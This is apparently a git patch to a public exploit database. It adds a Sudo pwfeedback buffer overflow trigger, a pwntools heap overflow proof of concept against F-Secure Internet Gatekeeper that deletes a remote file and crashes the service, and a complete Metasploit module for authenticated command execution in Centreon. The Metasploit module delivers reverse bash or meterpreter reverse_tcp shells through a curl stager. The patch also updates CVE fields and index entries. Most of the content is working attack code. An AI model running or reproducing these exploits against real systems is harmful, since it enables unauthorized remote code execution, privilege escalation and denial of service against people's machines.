From 9a3ddbdd3a604a311ca8a93c98c16eecaeec7a96 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 5 Feb 2020 05:02:01 +0000 Subject: [PATCH] DB: 2020-02-05 5 changes to exploits/shellcodes Sudo 1.8.25p - Buffer Overflow Centreon 19.10.5 - 'Pollers' Remote Command Execution (Metasploit) F-Secure Internet Gatekeeper 5.40 - Heap Overflow (PoC) --- exploits/hardware/webapps/47958.txt | 2 +- exploits/linux/local/47995.txt | 33 +++ exploits/linux/webapps/47996.py | 62 ++++++ exploits/php/webapps/47989.php | 2 +- exploits/php/webapps/47994.rb | 311 ++++++++++++++++++++++++++++ files_exploits.csv | 3 + 6 files changed, 411 insertions(+), 2 deletions(-) create mode 100644 exploits/linux/local/47995.txt create mode 100755 exploits/linux/webapps/47996.py create mode 100755 exploits/php/webapps/47994.rb diff --git a/exploits/hardware/webapps/47958.txt b/exploits/hardware/webapps/47958.txt index 42806cc97..863a1d4ed 100644 --- a/exploits/hardware/webapps/47958.txt +++ b/exploits/hardware/webapps/47958.txt @@ -6,7 +6,7 @@ # Version: TP-Link TP-SG105E V4 # Tested on: TP-SG105E V4 1.0.0 Build 20181120 # Patch from vendor : https://static.tp-link.com/2020/202001/20200120/TL-SG105Ev4.0_en_1.0.0_[20200119-rel.52079]_up.zip -# CVE : N/A +# CVE : CVE-2019-16893 # TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot # The TP-Link TP-SG105E is a "5-Port Gigabit Easy Smart Switch". diff --git a/exploits/linux/local/47995.txt b/exploits/linux/local/47995.txt new file mode 100644 index 000000000..a00369a85 --- /dev/null +++ b/exploits/linux/local/47995.txt @@ -0,0 +1,33 @@ +# Title: Sudo 1.8.25p - Buffer Overflow +# Date: 2020-01-30 +# Author: Joe Vennix +# Software: Sudo +# Versions: Sudo versions prior to 1.8.26 +# CVE: CVE-2019-18634 +# Reference: https://www.sudo.ws/alerts/pwfeedback.html + +# Sudo's pwfeedback option can be used to provide visual feedback when the user is inputting +# their password. For each key press, an asterisk is printed. This option was added in +# response to user confusion over how the standard Password: prompt disables the echoing +# of key presses. While pwfeedback is not enabled by default in the upstream version of sudo, +# some systems, such as Linux Mint and Elementary OS, do enable it in their default sudoers files. + +# Due to a bug, when the pwfeedback option is enabled in the sudoers file, a user may be able to trigger a stack-based buffer overflow. +# This bug can be triggered even by users not listed in the sudoers file. There is no impact unless pwfeedback has been enabled. + +The folowing sudoers configuration is vulnerable: + + $ sudo -l + Matching Defaults entries for millert on linux-build: + insults, pwfeedback, mail_badpass, mailerpath=/usr/sbin/sendmail + + User millert may run the following commands on linux-build: + (ALL : ALL) ALL + +# Exploiting the bug does not require sudo permissions, merely that pwfeedback be enabled. +# The bug can be reproduced by passing a large input to sudo via a pipe when it prompts for a password. + + $ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id + Password: Segmentation fault + +If pwfeedback is enabled in sudoers, the stack overflow may allow unprivileged users to escalate to the root account. \ No newline at end of file diff --git a/exploits/linux/webapps/47996.py b/exploits/linux/webapps/47996.py new file mode 100755 index 000000000..ff8888fb1 --- /dev/null +++ b/exploits/linux/webapps/47996.py @@ -0,0 +1,62 @@ +# Title: F-Secure Internet Gatekeeper 5.40 - Heap Overflow (PoC) +# Date: 2020-01-30 +# Author: Kevin Joensen +# Vendor: F-Secure +# Software: https://www.f-secure.com/en/business/downloads/internet-gatekeeper +# CVE: N/A +# Reference: https://blog.doyensec.com/2020/02/03/heap-exploit.html + +from pwn import * +import time +import sys + + + +def send_payload(payload, content_len=21487483844, nofun=False): + r = remote(sys.argv[1], 9012) + r.send("POST / HTTP/1.1\n") + r.send("Host: 192.168.0.122:9012\n") + r.send("Content-Length: {}\n".format(content_len)) + r.send("\n") + r.send(payload) + if not nofun: + r.send("\n\n") + return r + + +def trigger_exploit(): + print "Triggering exploit" + payload = "" + payload += "A" * 12 # Padding + payload += p32(0x1d) # Fast bin chunk overwrite + payload += "A"* 488 # Padding + payload += p32(0xdda00771) # Address of payload + payload += p32(0xdda00771+4) # Junk + r = send_payload(payload) + + + +def massage_heap(filename): + print "Trying to massage the heap....." + for x in xrange(100): + payload = "" + payload += p32(0x0) # Needed to bypass checks + payload += p32(0x0) # Needed to bypass checks + payload += p32(0xdda0077d) # Points to where the filename will be in memory + payload += filename + "\x00" + payload += "C"*(0x300-len(payload)) + r = send_payload(payload, content_len=0x80000, nofun=True) + r.close() + cut_conn = True + print "Heap massage done" + + +if __name__ == "__main__": + if len(sys.argv) != 3: + print "Usage: ./{} ".format(sys.argv[0]) + print "Run `export PWNLIB_SILENT=1` for disabling verbose connections" + exit() + massage_heap(sys.argv[2]) + time.sleep(1) + trigger_exploit() + print "Exploit finished. {} is now removed and remote process should be crashed".format(sys.argv[2]) \ No newline at end of file diff --git a/exploits/php/webapps/47989.php b/exploits/php/webapps/47989.php index 50964ec40..0fff0be48 100644 --- a/exploits/php/webapps/47989.php +++ b/exploits/php/webapps/47989.php @@ -7,7 +7,7 @@ # Software Link: https://www.phplist.org/download-phplist/ # Version: 3.5.0 # Tested on: Linux -# CVE : N/A +# CVE : CVE-2020-8547 Background of the Vulnerability : diff --git a/exploits/php/webapps/47994.rb b/exploits/php/webapps/47994.rb new file mode 100755 index 000000000..294fa6710 --- /dev/null +++ b/exploits/php/webapps/47994.rb @@ -0,0 +1,311 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::CmdStager + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Centreon Poller Authenticated Remote Command Execution', + 'Description' => %q{ + TODO + }, + 'Author' => [ + 'Omri Baso', # discovery + 'Fabien Aunay', # discovery + 'mekhalleh (RAMELLA Sébastien)' # this module + ], + 'References' => [ + # TODO: waiting for CVE + ['EDB', '47977'] + ], + 'DisclosureDate' => '2020-01-27', + 'License' => MSF_LICENSE, + 'Platform' => ['linux', 'unix'], + 'Arch' => [ARCH_CMD, ARCH_X64], + 'Privileged' => true, + 'Targets' => [ + ['Reverse shell (In-Memory)', + 'Platform' => 'unix', + 'Type' => :cmd_unix, + 'Arch' => ARCH_CMD, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/unix/reverse_bash' + } + ], + ['Meterpreter (Dropper)', + 'Platform' => 'linux', + 'Type' => :meterpreter, + 'Arch' => ARCH_X64, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', + 'CMDSTAGER::FLAVOR' => 'curl' # illegal characters: `~$^&"|'<> + } + ] + ], + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] + } + )) + + register_options([ + OptString.new('PASSWORD', [true, 'The Centreon Web panel password to authenticate with']), + OptString.new('TARGETURI', [true, 'The URI of the Centreon Web panel path', '/centreon']), + OptString.new('USERNAME', [true, 'The Centreon Web panel username to authenticate with']) + ]) + end + + def create_new_poller(poller_name, command_id) + print_status("Create new poller entry on the target.") + token = get_token(normalize_uri(target_uri.path, 'main.get.php'), {'p' => '60901'}) + return false unless token + + response = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'main.get.php?p=60901'), + 'cookie' => @cookies, + 'partial' => true, + 'vars_post' => { + 'name' => poller_name, + 'ns_ip_address' => '127.0.0.1', + 'localhost[localhost]' => '1', + 'is_default[is_default]' => '0', + 'remote_id' => '', + 'ssh_port' => '22', + 'remote_server_centcore_ssh_proxy[remote_server_centcore_ssh_proxy]' => '1', + 'engine_start_command' => 'service centengine start', + 'engine_stop_command' => 'service centengine stop', + 'engine_restart_command' => 'service centengine restart', + 'engine_reload_command' => 'service centengine reload', + 'nagios_bin' => '/usr/sbin/centengine', + 'nagiostats_bin' => '/usr/sbin/centenginestats', + 'nagios_perfdata' => '/var/log/centreon-engine/service-perfdata', + 'broker_reload_command' => 'service cbd reload', + 'centreonbroker_cfg_path' => '/etc/centreon-broker', + 'centreonbroker_module_path' => '/usr/share/centreon/lib/centreon-broker', + 'centreonbroker_logs_path' => '/var/log/centreon-broker', + 'centreonconnector_path' => '', + 'init_script_centreontrapd' => 'centreontrapd', + 'snmp_trapd_path_conf' => '/etc/snmp/centreon_traps/', + 'pollercmd[0]' => command_id, + 'clone_order_pollercmd_0' => '', + 'ns_activate[ns_activate]' => '1', + 'submitA' => 'Save', + 'id' => '', + 'o' => 'a', + 'centreon_token' => token + } + ) + return false unless response + + return true + end + + def execute_command(command, opts = {}) + cmd_name = rand_text_alpha(8..42) + poller_name = rand_text_alpha(8..42) + + ## Register a miscellaneous command. + print_status("Upload command payload on the target.") + token = get_token(normalize_uri(target_uri.path, 'main.get.php'), {'p' => '60803', 'type' => '3'}) + return false unless token + + response = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'main.get.php?p=60803&type=3'), + 'cookie' => @cookies, + 'partial' => true, + 'vars_post' => { + 'command_name' => cmd_name, + 'command_type[command_type]' => '3', + 'command_line' => command, + 'resource' => '$CENTREONPLUGINS$', + 'plugins' => '/Centreon/SNMP', + 'macros' => '$ADMINEMAIL$', + 'command_example' => '', + 'listOfArg' => '', + 'listOfMacros' => '', + 'connectors' => '', + 'graph_id' => '', + 'command_activate[command_activate]' => '1', + 'command_comment' => '', + 'submitA' => 'Save', + 'command_id' => '', + 'type' => '3', + 'o' => 'a', + 'centreon_token' => token + } + ) + return false unless response + + ## Create new poller to serve the payload. + create_new_poller(poller_name, get_command_id(cmd_name)) + poller_id = get_poller_id(poller_name) + + ## Export configuration to reload to trigger the exploit. + unless poller_id.nil? + restart_exportation(poller_id) + end + end + + def get_auth + print_status("Send authentication request.") + token = get_token(normalize_uri(target_uri.path, 'index.php')) + unless token.nil? + response = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'index.php'), + 'cookie' => @cookies, + 'vars_post' => { + 'useralias' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'], + 'submitLogin' => 'Connect', + 'centreon_token' => token + } + ) + return false unless response + + if response.redirect? + if response.headers['location'].include?('main.php') + print_status('Successful authenticated.') + @cookies = response.get_cookies + return true + end + end + end + + print_bad('Your credentials are incorrect.') + return false + end + + def get_command_id(cmd_name) + response = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'main.get.php'), + 'cookie' => @cookies, + 'vars_get' => { + 'p' => '60803', + 'type' => '3' + } + ) + return nil unless response + + href = response.get_html_document.at("//a[contains(text(), \"#{cmd_name}\")]")['href'] + return nil unless href + + id = href.split('?')[1].split('&')[2].split('=')[1] + return id unless id.empty? + + return nil + end + + def get_poller_id(poller_name) + response = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'main.get.php'), + 'cookie' => @cookies, + 'vars_get' => {'p' => '60901'} + ) + return nil unless response + + href = response.get_html_document.at("//a[contains(text(), \"#{poller_name}\")]")['href'] + return nil unless href + + id = href.split('?')[1].split('&')[2].split('=')[1] + return id unless id.empty? + + return nil + end + + def get_session + response = send_request_cgi( + 'method' => 'HEAD', + 'uri' => normalize_uri(target_uri.path, 'index.php') + ) + cookies = response.get_cookies + return cookies unless cookies.empty? + end + + def get_token(uri, params = {}) + ## Get centreon_token value. + request = { + 'method' => 'GET', + 'uri' => uri, + 'cookie' => @cookies + } + request = request.merge({'vars_get' => params}) unless params.empty? + response = send_request_cgi(request) + + return nil unless response + return response.get_html_document.at('input[@name="centreon_token"]')['value'] + end + + def restart_exportation(poller_id) + print_status("Reload the poller to trigger exploitation.") + token = get_token(normalize_uri(target_uri.path, 'main.get.php'), {'p' => '60902', 'poller' => poller_id}) + + vprint_status(' -- Generating files.') + unless token.nil? + response = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'generateFiles.php'), + 'cookie' => @cookies, + 'vars_post' => { + 'poller' => poller_id, + 'debug' => 'true', + 'generate' => 'true' + } + ) + return nil unless response + + vprint_status(' -- Restarting engine.') + response = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'restartPollers.php'), + 'cookie' => @cookies, + 'vars_post' => { + 'poller' => poller_id, + 'mode' => '2' + } + ) + return nil unless response + + vprint_status(' -- Executing command.') + response = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'postcommand.php'), + 'cookie' => @cookies, + 'vars_post' => {'poller' => poller_id} + ) + return nil unless response + end + end + + def check + # TODO: Detection by version number (waiting to know the impacted versions). + end + + def exploit + ## TODO: check + + @cookies = get_session + logged = get_auth unless @cookies.empty? + if logged + case target['Type'] + when :cmd_unix + execute_command(payload.encoded) + when :meterpreter + execute_command(generate_cmdstager.join) + end + end + end + +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b5a7de656..c5d8c965d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10925,6 +10925,7 @@ id,file,description,date,author,type,platform,port 47965,exploits/windows/local/47965.py,"Torrent 3GP Converter 1.51 - Stack Overflow (SEH)",2020-01-27,boku,local,windows, 47974,exploits/windows/local/47974.txt,"XMLBlueprint 16.191112 - XML External Entity Injection",2020-01-29,"Javier Olmedo",local,windows, 47975,exploits/windows/local/47975.c,"Microsoft Windows 10 - Theme API 'ThemePack' File Parsing",2020-01-29,"Eduardo Braun Prado",local,windows, +47995,exploits/linux/local/47995.txt,"Sudo 1.8.25p - Buffer Overflow",2020-02-04,"Joe Vennix",local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42289,3 +42290,5 @@ id,file,description,date,author,type,platform,port 47990,exploits/java/webapps/47990.py,"Jira 8.3.4 - Information Disclosure (Username Enumeration)",2020-02-03,"Mufeed VH",webapps,java, 47991,exploits/hardware/webapps/47991.py,"Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection",2020-02-03,"Cosmin Craciun",webapps,hardware, 47992,exploits/php/webapps/47992.txt,"School ERP System 1.0 - Cross Site Request Forgery (Add Admin)",2020-02-03,J3rryBl4nks,webapps,php, +47994,exploits/php/webapps/47994.rb,"Centreon 19.10.5 - 'Pollers' Remote Command Execution (Metasploit)",2020-02-04,mekhalleh,webapps,php, +47996,exploits/linux/webapps/47996.py,"F-Secure Internet Gatekeeper 5.40 - Heap Overflow (PoC)",2020-02-04,"Kevin Joensen",webapps,linux,